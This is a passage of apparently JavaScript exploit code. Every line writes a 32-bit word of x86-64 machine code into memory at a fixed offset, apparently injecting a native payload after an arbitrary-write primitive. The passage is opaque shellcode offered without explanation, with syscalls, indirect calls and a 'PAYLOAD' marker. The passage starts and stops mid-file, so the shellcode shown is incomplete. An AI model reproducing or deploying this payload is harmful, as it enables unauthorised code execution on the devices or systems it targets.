 762 |   p.write4(addr.add32(0x00000be0), 0x00001b64);
 763 |   p.write4(addr.add32(0x00000be4), 0xf8358d48);
 764 |   p.write4(addr.add32(0x00000be8), 0xe8000018);
 765 |   p.write4(addr.add32(0x00000bec), 0xfffffb02);
 766 |   p.write4(addr.add32(0x00000bf0), 0x8d48df89);
 767 |   p.write4(addr.add32(0x00000bf4), 0x001b5f15);
 768 |   p.write4(addr.add32(0x00000bf8), 0x358d4800);
 769 |   p.write4(addr.add32(0x00000bfc), 0x000018e9);
 770 |   p.write4(addr.add32(0x00000c00), 0xfffaede8);
 771 |   p.write4(addr.add32(0x00000c04), 0x5bdf89ff);
 772 |   p.write4(addr.add32(0x00000c08), 0x79158d48);
 773 |   p.write4(addr.add32(0x00000c0c), 0x4800001a);
 774 |   p.write4(addr.add32(0x00000c10), 0x18da358d);
 775 |   p.write4(addr.add32(0x00000c14), 0xd7e90000);
 776 |   p.write4(addr.add32(0x00000c18), 0x48fffffa);
 777 |   p.write4(addr.add32(0x00000c1c), 0x8949c031);
 778 |   p.write4(addr.add32(0x00000c20), 0x72050fca);
 779 |   p.write4(addr.add32(0x00000c24), 0x8348c301);
 780 |   p.write4(addr.add32(0x00000c28), 0x0019523d);
 781 |   p.write4(addr.add32(0x00000c2c), 0x18740000);
 782 |   p.write4(addr.add32(0x00000c30), 0x4915ff50);
 783 |   p.write4(addr.add32(0x00000c34), 0x59000019);
 784 |   p.write4(addr.add32(0x00000c38), 0xc7480889);
 785 |   p.write4(addr.add32(0x00000c3c), 0xffffffc0);
 786 |   p.write4(addr.add32(0x00000c40), 0xc2c748ff);
 787 |   p.write4(addr.add32(0x00000c44), 0xffffffff);
 788 |   p.write4(addr.add32(0x00000c48), 0x000000c3);
 789 |   p.write4(addr.add32(0x00000c4c), 0x4f414430);
 790 |   p.write4(addr.add32(0x00000c50), 0x5041594c);
 791 |   p.write4(addr.add32(0x00000c54), 0x00001260);
 792 |   p.write4(addr.add32(0x00000c58), 0x00000000);
 793 |   p.write4(addr.add32(0x00000c5c), 0x000011a0);
 794 |   p.write4(addr.add32(0x00000c60), 0x00000000);
 795 |   p.write4(addr.add32(0x00000c64), 0x00000a34);
 796 |   p.write4(addr.add32(0x00000c68), 0x00000000);
 797 |   p.write4(addr.add32(0x00000c6c), 0x56415741);
 798 |   p.write4(addr.add32(0x00000c70), 0x54415541);
 799 |   p.write4(addr.add32(0x00000c74), 0x83485355);
 800 |   p.write4(addr.add32(0x00000c78), 0x894928ec);
 801 |   p.write4(addr.add32(0x00000c7c), 0xf68949fd);
 802 |   p.write4(addr.add32(0x00000c80), 0x49d78941);
 803 |   p.write4(addr.add32(0x00000c84), 0x4865cc89);
 804 |   p.write4(addr.add32(0x00000c88), 0x00252c8b);
 805 |   p.write4(addr.add32(0x00000c8c), 0x48000000);
 806 |   p.write4(addr.add32(0x00000c90), 0x0c245c8d);
 807 |   p.write4(addr.add32(0x00000c94), 0x000014ba);
 808 |   p.write4(addr.add32(0x00000c98), 0xdf894800);
 809 |   p.write4(addr.add32(0x00000c9c), 0x15fff631);
 810 |   p.write4(addr.add32(0x00000ca0), 0x00001558);
 811 |   p.write4(addr.add32(0x00000ca4), 0x247c8944);
 812 |   p.write4(addr.add32(0x00000ca8), 0x7b8d480c);
 813 |   p.write4(addr.add32(0x00000cac), 0xf6894c04);
 814 |   p.write4(addr.add32(0x00000cb0), 0x000010ba);
 815 |   p.write4(addr.add32(0x00000cb4), 0x4915ff00);
 816 |   p.write4(addr.add32(0x00000cb8), 0x48000015);
 817 |   p.write4(addr.add32(0x00000cbc), 0x1502358b);
 818 |   p.write4(addr.add32(0x00000cc0), 0x89480000);
 819 |   p.write4(addr.add32(0x00000cc4), 0xffd231ef);
 820 |   p.write4(addr.add32(0x00000cc8), 0x00150f15);
 821 |   p.write4(addr.add32(0x00000ccc), 0xe9894c00);
 822 |   p.write4(addr.add32(0x00000cd0), 0x4cde8948);
 823 |   p.write4(addr.add32(0x00000cd4), 0xb841e789);
 824 |   p.write4(addr.add32(0x00000cd8), 0x00000020);
 825 |   p.write4(addr.add32(0x00000cdc), 0x000014ba);
 826 |   p.write4(addr.add32(0x00000ce0), 0x4515ff00);
 827 |   p.write4(addr.add32(0x00000ce4), 0x48000014);
 828 |   p.write4(addr.add32(0x00000ce8), 0x14d6358b);
 829 |   p.write4(addr.add32(0x00000cec), 0x89480000);
 830 |   p.write4(addr.add32(0x00000cf0), 0xdd15ffef);
 831 |   p.write4(addr.add32(0x00000cf4), 0x48000014);
 832 |   p.write4(addr.add32(0x00000cf8), 0x5b28c483);
 833 |   p.write4(addr.add32(0x00000cfc), 0x415c415d);
 834 |   p.write4(addr.add32(0x00000d00), 0x415e415d);
 835 |   p.write4(addr.add32(0x00000d04), 0xc031c35f);
 836 |   p.write4(addr.add32(0x00000d08), 0x74ff8548);
 837 |   p.write4(addr.add32(0x00000d0c), 0x058b4815);
 838 |   p.write4(addr.add32(0x00000d10), 0x000014a0);
 839 |   p.write4(addr.add32(0x00000d14), 0x48008b48);
 840 |   p.write4(addr.add32(0x00000d18), 0x0674c085);
 841 |   p.write4(addr.add32(0x00000d1c), 0x20783b48);
 842 |   p.write4(addr.add32(0x00000d20), 0x55c3f275);
 843 |   p.write4(addr.add32(0x00000d24), 0xec834853);
 844 |   p.write4(addr.add32(0x00000d28), 0x7c894818);
 845 |   p.write4(addr.add32(0x00000d2c), 0x48650824);
 846 |   p.write4(addr.add32(0x00000d30), 0x00252c8b);
 847 |   p.write4(addr.add32(0x00000d34), 0x48000000);
 848 |   p.write4(addr.add32(0x00000d38), 0x1486358b);
 849 |   p.write4(addr.add32(0x00000d3c), 0xd2310000);
 850 |   p.write4(addr.add32(0x00000d40), 0xffef8948);
 851 |   p.write4(addr.add32(0x00000d44), 0x00149315);
 852 |   p.write4(addr.add32(0x00000d48), 0x4c8b4c00);
 853 |   p.write4(addr.add32(0x00000d4c), 0xb8410824);
 854 |   p.write4(addr.add32(0x00000d50), 0x00000080);
 855 |   p.write4(addr.add32(0x00000d54), 0x810d8d48);
 856 |   p.write4(addr.add32(0x00000d58), 0xba00000c);
 857 |   p.write4(addr.add32(0x00000d5c), 0x00000090);
 858 |   p.write4(addr.add32(0x00000d60), 0x10798d49);
 859 |   p.write4(addr.add32(0x00000d64), 0xfffe8948);
 860 |   p.write4(addr.add32(0x00000d68), 0x0013c715);
 861 |   p.write4(addr.add32(0x00000d6c), 0x358b4800);
 862 |   p.write4(addr.add32(0x00000d70), 0x00001450);
 863 |   p.write4(addr.add32(0x00000d74), 0x85ef8948);
 864 |   p.write4(addr.add32(0x00000d78), 0xb8c389c0);
 865 |   p.write4(addr.add32(0x00000d7c), 0x800f0a25);
 866 |   p.write4(addr.add32(0x00000d80), 0xffd8450f);
 867 |   p.write4(addr.add32(0x00000d84), 0x00144b15);
 868 |   p.write4(addr.add32(0x00000d88), 0xc4834800);
 869 |   p.write4(addr.add32(0x00000d8c), 0x5bd88918);
 870 |   p.write4(addr.add32(0x00000d90), 0x5355c35d);
 871 |   p.write4(addr.add32(0x00000d94), 0x51fd8948);
 872 |   p.write4(addr.add32(0x00000d98), 0x087f8b48);
 873 |   p.write4(addr.add32(0x00000d9c), 0x63e8db31);
 874 |   p.write4(addr.add32(0x00000da0), 0x48ffffff);
 875 |   p.write4(addr.add32(0x00000da4), 0x0474c085);
 876 |   p.write4(addr.add32(0x00000da8), 0x10588b48);
 877 |   p.write4(addr.add32(0x00000dac), 0xffef8948);
 878 |   p.write4(addr.add32(0x00000db0), 0x00139f15);
 879 |   p.write4(addr.add32(0x00000db4), 0x75c08500);
 880 |   p.write4(addr.add32(0x00000db8), 0x047d8306);
 881 |   p.write4(addr.add32(0x00000dbc), 0x481b7400);
 882 |   p.write4(addr.add32(0x00000dc0), 0x1674db85);
 883 |   p.write4(addr.add32(0x00000dc4), 0x02003b81);
 884 |   p.write4(addr.add32(0x00000dc8), 0x0e750000);
 885 |   p.write4(addr.add32(0x00000dcc), 0x247b8d48);
 886 |   p.write4(addr.add32(0x00000dd0), 0xffff4ee8);
 887 |   p.write4(addr.add32(0x00000dd4), 0x044589ff);
 888 |   p.write4(addr.add32(0x00000dd8), 0x5b5ac031);
 889 |   p.write4(addr.add32(0x00000ddc), 0x5541c35d);
 890 |   p.write4(addr.add32(0x00000de0), 0x48555441);
 891 |   p.write4(addr.add32(0x00000de4), 0x5153fd89);
 892 |   p.write4(addr.add32(0x00000de8), 0x087f8b48);
 893 |   p.write4(addr.add32(0x00000dec), 0x13e8db31);
 894 |   p.write4(addr.add32(0x00000df0), 0x48ffffff);
 895 |   p.write4(addr.add32(0x00000df4), 0x0474c085);
 896 |   p.write4(addr.add32(0x00000df8), 0x10588b48);
 897 |   p.write4(addr.add32(0x00000dfc), 0xffef8948);
 898 |   p.write4(addr.add32(0x00000e00), 0x00134f15);
 899 |   p.write4(addr.add32(0x00000e04), 0x41c08500);
 900 |   p.write4(addr.add32(0x00000e08), 0x0675c489);
 901 |   p.write4(addr.add32(0x00000e0c), 0x00047d83);
 902 |   p.write4(addr.add32(0x00000e10), 0x85484e74);
 903 |   p.write4(addr.add32(0x00000e14), 0x664974db);
 904 |   p.write4(addr.add32(0x00000e18), 0x02507b83);
 905 |   p.write4(addr.add32(0x00000e1c), 0x8d4c4275);
 906 |   p.write4(addr.add32(0x00000e20), 0x000260ab);
 907 |   p.write4(addr.add32(0x00000e24), 0xef894c00);
 908 |   p.write4(addr.add32(0x00000e28), 0xfffef6e8);
 909 |   p.write4(addr.add32(0x00000e2c), 0x75c085ff);
 910 |   p.write4(addr.add32(0x00000e30), 0x00a0ba2f);
 911 |   p.write4(addr.add32(0x00000e34), 0x894c0000);
 912 |   p.write4(addr.add32(0x00000e38), 0xdf8948ee);
 913 |   p.write4(addr.add32(0x00000e3c), 0xffe43145);
 914 |   p.write4(addr.add32(0x00000e40), 0x0013bf15);
 915 |   p.write4(addr.add32(0x00000e44), 0xbb8d4800);
 916 |   p.write4(addr.add32(0x00000e48), 0x000000a0);
 917 |   p.write4(addr.add32(0x00000e4c), 0x000360ba);
 918 |   p.write4(addr.add32(0x00000e50), 0xfff63100);
 919 |   p.write4(addr.add32(0x00000e54), 0x0013a315);
 920 |   p.write4(addr.add32(0x00000e58), 0x0445c700);
 921 |   p.write4(addr.add32(0x00000e5c), 0x00000000);
 922 |   p.write4(addr.add32(0x00000e60), 0xe089445a);
 923 |   p.write4(addr.add32(0x00000e64), 0x5c415d5b);
 924 |   p.write4(addr.add32(0x00000e68), 0x83c35d41);
 925 |   p.write4(addr.add32(0x00000e6c), 0x0674083f);
 926 |   p.write4(addr.add32(0x00000e70), 0x12d625ff);
 927 |   p.write4(addr.add32(0x00000e74), 0x478b0000);
 928 |   p.write4(addr.add32(0x00000e78), 0xc1c18918);
 929 |   p.write4(addr.add32(0x00000e7c), 0xf07518e9);
 930 |   p.write4(addr.add32(0x00000e80), 0xe281c289);
 931 |   p.write4(addr.add32(0x00000e84), 0x000c0000);
 932 |   p.write4(addr.add32(0x00000e88), 0x0000fa81);
 933 |   p.write4(addr.add32(0x00000e8c), 0xe075000c);
 934 |   p.write4(addr.add32(0x00000e90), 0x37387f81);
 935 |   p.write4(addr.add32(0x00000e94), 0x75000013);
 936 |   p.write4(addr.add32(0x00000e98), 0xffff25d7);
 937 |   p.write4(addr.add32(0x00000e9c), 0x4789fffb);
 938 |   p.write4(addr.add32(0x00000ea0), 0x48c03118);
 939 |   p.write4(addr.add32(0x00000ea4), 0x8d48c189);
 940 |   p.write4(addr.add32(0x00000ea8), 0x000b2e15);
 941 |   p.write4(addr.add32(0x00000eac), 0xd9f74800);
 942 |   p.write4(addr.add32(0x00000eb0), 0x8811148a);
 943 |   p.write4(addr.add32(0x00000eb4), 0x48380754);
 944 |   p.write4(addr.add32(0x00000eb8), 0x8348c0ff);
 945 |   p.write4(addr.add32(0x00000ebc), 0xe37510f8);
 946 |   p.write4(addr.add32(0x00000ec0), 0x5741aeeb);
 947 |   p.write4(addr.add32(0x00000ec4), 0x55415641);
 948 |   p.write4(addr.add32(0x00000ec8), 0x53555441);
 949 |   p.write4(addr.add32(0x00000ecc), 0xc0ec8148);
 950 |   p.write4(addr.add32(0x00000ed0), 0x49000001);
 951 |   p.write4(addr.add32(0x00000ed4), 0x848bfd89);
 952 |   p.write4(addr.add32(0x00000ed8), 0x00021824);
 953 |   p.write4(addr.add32(0x00000edc), 0x74894800);
 954 |   p.write4(addr.add32(0x00000ee0), 0x8b440824);
 955 |   p.write4(addr.add32(0x00000ee4), 0x021024b4);
 956 |   p.write4(addr.add32(0x00000ee8), 0x89480000);
 957 |   p.write4(addr.add32(0x00000eec), 0x564150d3);
 958 |   p.write4(addr.add32(0x00000ef0), 0x1824848b);
 959 |   p.write4(addr.add32(0x00000ef4), 0x50000002);
 960 |   p.write4(addr.add32(0x00000ef8), 0x1824b4ff);
 961 |   p.write4(addr.add32(0x00000efc), 0xff000002);
 962 |   p.write4(addr.add32(0x00000f00), 0x021824b4);
 963 |   p.write4(addr.add32(0x00000f04), 0x8b480000);
 964 |   p.write4(addr.add32(0x00000f08), 0xff302474);
 965 |   p.write4(addr.add32(0x00000f0c), 0x00125b15);
 966 |   p.write4(addr.add32(0x00000f10), 0xc4834800);
 967 |   p.write4(addr.add32(0x00000f14), 0x41c08530);
 968 |   p.write4(addr.add32(0x00000f18), 0x840fc489);
 969 |   p.write4(addr.add32(0x00000f1c), 0x000002e6);
 970 |   p.write4(addr.add32(0x00000f20), 0x0ff68545);
 971 |   p.write4(addr.add32(0x00000f24), 0x0002dd85);
 972 |   p.write4(addr.add32(0x00000f28), 0x6c8d4800);
 973 |   p.write4(addr.add32(0x00000f2c), 0xf6312024);
 974 |   p.write4(addr.add32(0x00000f30), 0xbaef8948);
 975 |   p.write4(addr.add32(0x00000f34), 0x00000010);
 976 |   p.write4(addr.add32(0x00000f38), 0x24748d4c);
 977 |   p.write4(addr.add32(0x00000f3c), 0x7c8d4c30);
 978 |   p.write4(addr.add32(0x00000f40), 0x15ff5024);
 979 |   p.write4(addr.add32(0x00000f44), 0x000012b4);
 980 |   p.write4(addr.add32(0x00000f48), 0x245c8948);
 981 |   p.write4(addr.add32(0x00000f4c), 0x48f63120);
 982 |   p.write4(addr.add32(0x00000f50), 0x282444c7);
 983 |   p.write4(addr.add32(0x00000f54), 0x00000100);
 984 |   p.write4(addr.add32(0x00000f58), 0xbaf7894c);
 985 |   p.write4(addr.add32(0x00000f5c), 0x00000010);
 986 |   p.write4(addr.add32(0x00000f60), 0x129615ff);
 987 |   p.write4(addr.add32(0x00000f64), 0x8d4c0000);
 988 |   p.write4(addr.add32(0x00000f68), 0x4c702444);
 989 |   p.write4(addr.add32(0x00000f6c), 0x30247c89);
 990 |   p.write4(addr.add32(0x00000f70), 0x2444c748);
 991 |   p.write4(addr.add32(0x00000f74), 0x00002038);
 992 |   p.write4(addr.add32(0x00000f78), 0x0048ba00);
 993 |   p.write4(addr.add32(0x00000f7c), 0xf6310000);
 994 |   p.write4(addr.add32(0x00000f80), 0x4cc7894c);
 995 |   p.write4(addr.add32(0x00000f84), 0x08244489);
 996 |   p.write4(addr.add32(0x00000f88), 0x126e15ff);
 997 |   p.write4(addr.add32(0x00000f8c), 0x8d480000);
 998 |   p.write4(addr.add32(0x00000f90), 0x000c5705);
 999 |   p.write4(addr.add32(0x00000f94), 0x84894800);
1000 |   p.write4(addr.add32(0x00000f98), 0x00009024);
1001 |   p.write4(addr.add32(0x00000f9c), 0x058d4800);
1002 |   p.write4(addr.add32(0x00000fa0), 0x00000bc8);
1003 |   p.write4(addr.add32(0x00000fa4), 0x24848948);
1004 |   p.write4(addr.add32(0x00000fa8), 0x00000098);
1005 |   p.write4(addr.add32(0x00000fac), 0x39058d48);
1006 |   p.write4(addr.add32(0x00000fb0), 0x4800000b);
1007 |   p.write4(addr.add32(0x00000fb4), 0xa0248489);
1008 |   p.write4(addr.add32(0x00000fb8), 0x48000000);
1009 |   p.write4(addr.add32(0x00000fbc), 0x0aaa058d);
1010 |   p.write4(addr.add32(0x00000fc0), 0x89480000);
1011 |   p.write4(addr.add32(0x00000fc4), 0x00a82484);
1012 |   p.write4(addr.add32(0x00000fc8), 0x8d480000);
1013 |   p.write4(addr.add32(0x00000fcc), 0x000a1b05);
1014 |   p.write4(addr.add32(0x00000fd0), 0x84894800);
1015 |   p.write4(addr.add32(0x00000fd4), 0x0000b024);
1016 |   p.write4(addr.add32(0x00000fd8), 0x8b486500);
1017 |   p.write4(addr.add32(0x00000fdc), 0x0000251c);
1018 |   p.write4(addr.add32(0x00000fe0), 0x8b480000);
1019 |   p.write4(addr.add32(0x00000fe4), 0x0011db35);
1020 |   p.write4(addr.add32(0x00000fe8), 0x48d23100);
1021 |   p.write4(addr.add32(0x00000fec), 0x15ffdf89);
1022 |   p.write4(addr.add32(0x00000ff0), 0x000011e8);
1023 |   p.write4(addr.add32(0x00000ff4), 0x24448b4c);
1024 |   p.write4(addr.add32(0x00000ff8), 0xf7894c08);
1025 |   p.write4(addr.add32(0x00000ffc), 0x4cee8948);
1026 |   p.write4(addr.add32(0x00001000), 0x15ffc289);
1027 |   p.write4(addr.add32(0x00001004), 0x0000113c);
1028 |   p.write4(addr.add32(0x00001008), 0xb5358b48);
1029 |   p.write4(addr.add32(0x0000100c), 0x48000011);
1030 |   p.write4(addr.add32(0x00001010), 0x8941df89);
1031 |   p.write4(addr.add32(0x00001014), 0xb915ffc6);
1032 |   p.write4(addr.add32(0x00001018), 0x45000011);
1033 |   p.write4(addr.add32(0x0000101c), 0x850ff685);
1034 |   p.write4(addr.add32(0x00001020), 0x000001e2);
1035 |   p.write4(addr.add32(0x00001024), 0x813d8b48);
1036 |   p.write4(addr.add32(0x00001028), 0x4c000011);
1037 |   p.write4(addr.add32(0x0000102c), 0xb824b48d);
1038 |   p.write4(addr.add32(0x00001030), 0x31000000);
1039 |   p.write4(addr.add32(0x00001034), 0xb115fff6);
1040 |   p.write4(addr.add32(0x00001038), 0x31000011);
1041 |   p.write4(addr.add32(0x0000103c), 0x007cbaf6);
1042 |   p.write4(addr.add32(0x00001040), 0x894c0000);
1043 |   p.write4(addr.add32(0x00001044), 0x6c8d48f7);
1044 |   p.write4(addr.add32(0x00001048), 0x15ff4024);
1045 |   p.write4(addr.add32(0x0000104c), 0x000011ac);
1046 |   p.write4(addr.add32(0x00001050), 0x24848b48);
1047 |   p.write4(addr.add32(0x00001054), 0x000001f0);
1048 |   p.write4(addr.add32(0x00001058), 0x04568d4d);
1049 |   p.write4(addr.add32(0x0000105c), 0xbad1894c);
1050 |   p.write4(addr.add32(0x00001060), 0x00000001);
1051 |   p.write4(addr.add32(0x00001064), 0x4cff894c);
1052 |   p.write4(addr.add32(0x00001068), 0x10245489);
1053 |   p.write4(addr.add32(0x0000106c), 0x03700548);
1054 |   p.write4(addr.add32(0x00001070), 0xc7660000);
1055 |   p.write4(addr.add32(0x00001074), 0x00b82484);
1056 |   p.write4(addr.add32(0x00001078), 0x13370000);
1057 |   p.write4(addr.add32(0x0000107c), 0x48c68948);
1058 |   p.write4(addr.add32(0x00001080), 0x08244489);
1059 |   p.write4(addr.add32(0x00001084), 0x2484c766);
1060 |   p.write4(addr.add32(0x00001088), 0x000000ba);
1061 |   p.write4(addr.add32(0x0000108c), 0xd9e80020);
1062 |   p.write4(addr.add32(0x00001090), 0x48fffffb);
1063 |   p.write4(addr.add32(0x00001094), 0x112a358b);
1064 |   p.write4(addr.add32(0x00001098), 0xd2310000);
1065 |   p.write4(addr.add32(0x0000109c), 0xffdf8948);
1066 |   p.write4(addr.add32(0x000010a0), 0x00113715);
1067 |   p.write4(addr.add32(0x000010a4), 0xbaf63100);
1068 |   p.write4(addr.add32(0x000010a8), 0x00000010);
1069 |   p.write4(addr.add32(0x000010ac), 0xffef8948);
1070 |   p.write4(addr.add32(0x000010b0), 0x00114715);
1071 |   p.write4(addr.add32(0x000010b4), 0x548b4c00);
1072 |   p.write4(addr.add32(0x000010b8), 0x20ba1024);
1073 |   p.write4(addr.add32(0x000010bc), 0x49000000);
1074 |   p.write4(addr.add32(0x000010c0), 0xb841e989);
1075 |   p.write4(addr.add32(0x000010c4), 0x00000080);
1076 |   p.write4(addr.add32(0x000010c8), 0xfd0d8d48);
1077 |   p.write4(addr.add32(0x000010cc), 0x4c000008);
1078 |   p.write4(addr.add32(0x000010d0), 0x894cd689);
1079 |   p.write4(addr.add32(0x000010d4), 0x6115ffd7);
1080 |   p.write4(addr.add32(0x000010d8), 0x48000010);
1081 |   p.write4(addr.add32(0x000010dc), 0x10e2358b);
1082 |   p.write4(addr.add32(0x000010e0), 0x89480000);
1083 |   p.write4(addr.add32(0x000010e4), 0x244489df);
1084 |   p.write4(addr.add32(0x000010e8), 0xe515ff10);
1085 |   p.write4(addr.add32(0x000010ec), 0x8b000010);
1086 |   p.write4(addr.add32(0x000010f0), 0x85102454);
1087 |   p.write4(addr.add32(0x000010f4), 0xec850fd2);
1088 |   p.write4(addr.add32(0x000010f8), 0x48000000);
1089 |   p.write4(addr.add32(0x000010fc), 0x3424848d);
1090 |   p.write4(addr.add32(0x00001100), 0x31000001);
1091 |   p.write4(addr.add32(0x00001104), 0x007cbaf6);
1092 |   p.write4(addr.add32(0x00001108), 0x89480000);
1093 |   p.write4(addr.add32(0x0000110c), 0x448948c7);
1094 |   p.write4(addr.add32(0x00001110), 0x15ff1024);
1095 |   p.write4(addr.add32(0x00001114), 0x000010e4);
1096 |   p.write4(addr.add32(0x00001118), 0x24448b48);
1097 |   p.write4(addr.add32(0x0000111c), 0x0002ba10);
1098 |   p.write4(addr.add32(0x00001120), 0x8b480000);
1099 |   p.write4(addr.add32(0x00001124), 0x4c082474);
1100 |   p.write4(addr.add32(0x00001128), 0xc766ff89);
1101 |   p.write4(addr.add32(0x0000112c), 0x01342484);
1102 |   p.write4(addr.add32(0x00001130), 0x13370000);
1103 |   p.write4(addr.add32(0x00001134), 0x2484c766);
1104 |   p.write4(addr.add32(0x00001138), 0x00000136);
1105 |   p.write4(addr.add32(0x0000113c), 0x8d4c0020);
1106 |   p.write4(addr.add32(0x00001140), 0x894c0450);
1107 |   p.write4(addr.add32(0x00001144), 0x54894cd1);
1108 |   p.write4(addr.add32(0x00001148), 0x1de81824);
1109 |   p.write4(addr.add32(0x0000114c), 0x48fffffb);
1110 |   p.write4(addr.add32(0x00001150), 0x106e358b);
1111 |   p.write4(addr.add32(0x00001154), 0xd2310000);
1112 |   p.write4(addr.add32(0x00001158), 0xffdf8948);
1113 |   p.write4(addr.add32(0x0000115c), 0x00107b15);
1114 |   p.write4(addr.add32(0x00001160), 0x48f63100);
1115 |   p.write4(addr.add32(0x00001164), 0x10baef89);
1116 |   p.write4(addr.add32(0x00001168), 0xff000000);
1117 |   p.write4(addr.add32(0x0000116c), 0x00108b15);
1118 |   p.write4(addr.add32(0x00001170), 0x548b4c00);
1119 |   p.write4(addr.add32(0x00001174), 0x89491824);
1120 |   p.write4(addr.add32(0x00001178), 0x80b841e9);
1121 |   p.write4(addr.add32(0x0000117c), 0x48000000);
1122 |   p.write4(addr.add32(0x00001180), 0x08460d8d);
1123 |   p.write4(addr.add32(0x00001184), 0x20ba0000);
1124 |   p.write4(addr.add32(0x00001188), 0x4c000000);
1125 |   p.write4(addr.add32(0x0000118c), 0x894cd689);
1126 |   p.write4(addr.add32(0x00001190), 0xa515ffd7);
1127 |   p.write4(addr.add32(0x00001194), 0x4800000f);
1128 |   p.write4(addr.add32(0x00001198), 0x1026358b);
1129 |   p.write4(addr.add32(0x0000119c), 0x89480000);
1130 |   p.write4(addr.add32(0x000011a0), 0xffc589df);
1131 |   p.write4(addr.add32(0x000011a4), 0x00102b15);
1132 |   p.write4(addr.add32(0x000011a8), 0x75ed8500);
1133 |   p.write4(addr.add32(0x000011ac), 0xee894c3a);
1134 |   p.write4(addr.add32(0x000011b0), 0xfff7894c);
1135 |   p.write4(addr.add32(0x000011b4), 0x000fa315);
1136 |   p.write4(addr.add32(0x000011b8), 0x74c08500);
1137 |   p.write4(addr.add32(0x000011bc), 0x7d8b4106);
1138 |   p.write4(addr.add32(0x000011c0), 0x4819eb00);
1139 |   p.write4(addr.add32(0x000011c4), 0x4824348b);
1140 |   p.write4(addr.add32(0x000011c8), 0x10247c8b);
1141 |   p.write4(addr.add32(0x000011cc), 0x0f8a15ff);
1142 |   p.write4(addr.add32(0x000011d0), 0xc0850000);
1143 |   p.write4(addr.add32(0x000011d4), 0x8b482074);
1144 |   p.write4(addr.add32(0x000011d8), 0x388b2404);
1145 |   p.write4(addr.add32(0x000011dc), 0x74ffff83);
1146 |   p.write4(addr.add32(0x000011e0), 0x7d15ff06);
1147 |   p.write4(addr.add32(0x000011e4), 0x4800000f);
1148 |   p.write4(addr.add32(0x000011e8), 0x0fbe3d8b);
1149 |   p.write4(addr.add32(0x000011ec), 0x15ff0000);
1150 |   p.write4(addr.add32(0x000011f0), 0x00000ff0);
1151 |   p.write4(addr.add32(0x000011f4), 0x8b4810eb);
1152 |   p.write4(addr.add32(0x000011f8), 0x000faf3d);
1153 |   p.write4(addr.add32(0x000011fc), 0xe4314500);
1154 |   p.write4(addr.add32(0x00001200), 0x0fde15ff);
1155 |   p.write4(addr.add32(0x00001204), 0x81480000);
1156 |   p.write4(addr.add32(0x00001208), 0x0001b8c4);
1157 |   p.write4(addr.add32(0x0000120c), 0xe0894400);
1158 |   p.write4(addr.add32(0x00001210), 0x5c415d5b);
1159 |   p.write4(addr.add32(0x00001214), 0x5e415d41);
1160 |   p.write4(addr.add32(0x00001218), 0x31c35f41);
1161 |   p.write4(addr.add32(0x0000121c), 0xff8548c0);
1162 |   p.write4(addr.add32(0x00001220), 0x8b481574);
1163 |   p.write4(addr.add32(0x00001224), 0x000f8b05);
1164 |   p.write4(addr.add32(0x00001228), 0x008b4800);
1165 |   p.write4(addr.add32(0x0000122c), 0x74c08548);
1166 |   p.write4(addr.add32(0x00001230), 0x783b4806);
1167 |   p.write4(addr.add32(0x00001234), 0xc3f27520);
1168 |   p.write4(addr.add32(0x00001238), 0x48db3153);
1169 |   p.write4(addr.add32(0x0000123c), 0x4810ec83);
1170 |   p.write4(addr.add32(0x00001240), 0x2374ff85);
1171 |   p.write4(addr.add32(0x00001244), 0x75023f83);
1172 |   p.write4(addr.add32(0x00001248), 0x748d481e);
1173 |   p.write4(addr.add32(0x0000124c), 0x15ff0824);
1174 |   p.write4(addr.add32(0x00001250), 0x00000f38);
1175 |   p.write4(addr.add32(0x00001254), 0x0f75c085);
1176 |   p.write4(addr.add32(0x00001258), 0x24448b48);
1177 |   p.write4(addr.add32(0x0000125c), 0x48db3108);
1178 |   p.write4(addr.add32(0x00001260), 0x01087883);
1179 |   p.write4(addr.add32(0x00001264), 0x48c3940f);
1180 |   p.write4(addr.add32(0x00001268), 0x8910c483);
1181 |   p.write4(addr.add32(0x0000126c), 0x41c35bd8);
1182 |   p.write4(addr.add32(0x00001270), 0x48535554);
1183 |   p.write4(addr.add32(0x00001274), 0x8148fd89);
1184 |   p.write4(addr.add32(0x00001278), 0x0000a0ec);
1185 |   p.write4(addr.add32(0x0000127c), 0x013f8300);
1186 |   p.write4(addr.add32(0x00001280), 0x75cc8949);
1187 |   p.write4(addr.add32(0x00001284), 0xf685480c);
1188 |   p.write4(addr.add32(0x00001288), 0x854d3d74);
1189 |   p.write4(addr.add32(0x0000128c), 0xeb2c75e4);
1190 |   p.write4(addr.add32(0x00001290), 0x24548936);
1191 |   p.write4(addr.add32(0x00001294), 0x3489480c);
1192 |   p.write4(addr.add32(0x00001298), 0xff9ae824);
1193 |   p.write4(addr.add32(0x0000129c), 0x8b48ffff);
1194 |   p.write4(addr.add32(0x000012a0), 0xc0852434);
1195 |   p.write4(addr.add32(0x000012a4), 0x0c24548b);
1196 |   p.write4(addr.add32(0x000012a8), 0x894cdb75);
1197 |   p.write4(addr.add32(0x000012ac), 0xef8948e1);
1198 |   p.write4(addr.add32(0x000012b0), 0x0ece15ff);
1199 |   p.write4(addr.add32(0x000012b4), 0x37e90000);
1200 |   p.write4(addr.add32(0x000012b8), 0x48000001);
1201 |   p.write4(addr.add32(0x000012bc), 0x75e8ef89);
1202 |   p.write4(addr.add32(0x000012c0), 0x85ffffff);
1203 |   p.write4(addr.add32(0x000012c4), 0xbb0a75c0);
1204 |   p.write4(addr.add32(0x000012c8), 0x00000016);
1205 |   p.write4(addr.add32(0x000012cc), 0x0000f0e9);
1206 |   p.write4(addr.add32(0x000012d0), 0x748d4800);
1207 |   p.write4(addr.add32(0x000012d4), 0x89481024);
1208 |   p.write4(addr.add32(0x000012d8), 0xad15ffef);
1209 |   p.write4(addr.add32(0x000012dc), 0x8500000e);
1210 |   p.write4(addr.add32(0x000012e0), 0x0fc389c0);
1211 |   p.write4(addr.add32(0x000012e4), 0x0000d885);
1212 |   p.write4(addr.add32(0x000012e8), 0x00458b00);
1213 |   p.write4(addr.add32(0x000012ec), 0x7501f883);
1214 |   p.write4(addr.add32(0x000012f0), 0x558b480f);
1215 |   p.write4(addr.add32(0x000012f4), 0xd2854838);
1216 |   p.write4(addr.add32(0x000012f8), 0x00af840f);
1217 |   p.write4(addr.add32(0x000012fc), 0x6beb0000);
1218 |   p.write4(addr.add32(0x00001300), 0x0f02f883);
1219 |   p.write4(addr.add32(0x00001304), 0x0000bc85);
1220 |   p.write4(addr.add32(0x00001308), 0x758b4800);
1221 |   p.write4(addr.add32(0x0000130c), 0x4eb70f38);
1222 |   p.write4(addr.add32(0x00001310), 0x46b70f0c);
1223 |   p.write4(addr.add32(0x00001314), 0x518d4818);
1224 |   p.write4(addr.add32(0x00001318), 0xe0c148e0);
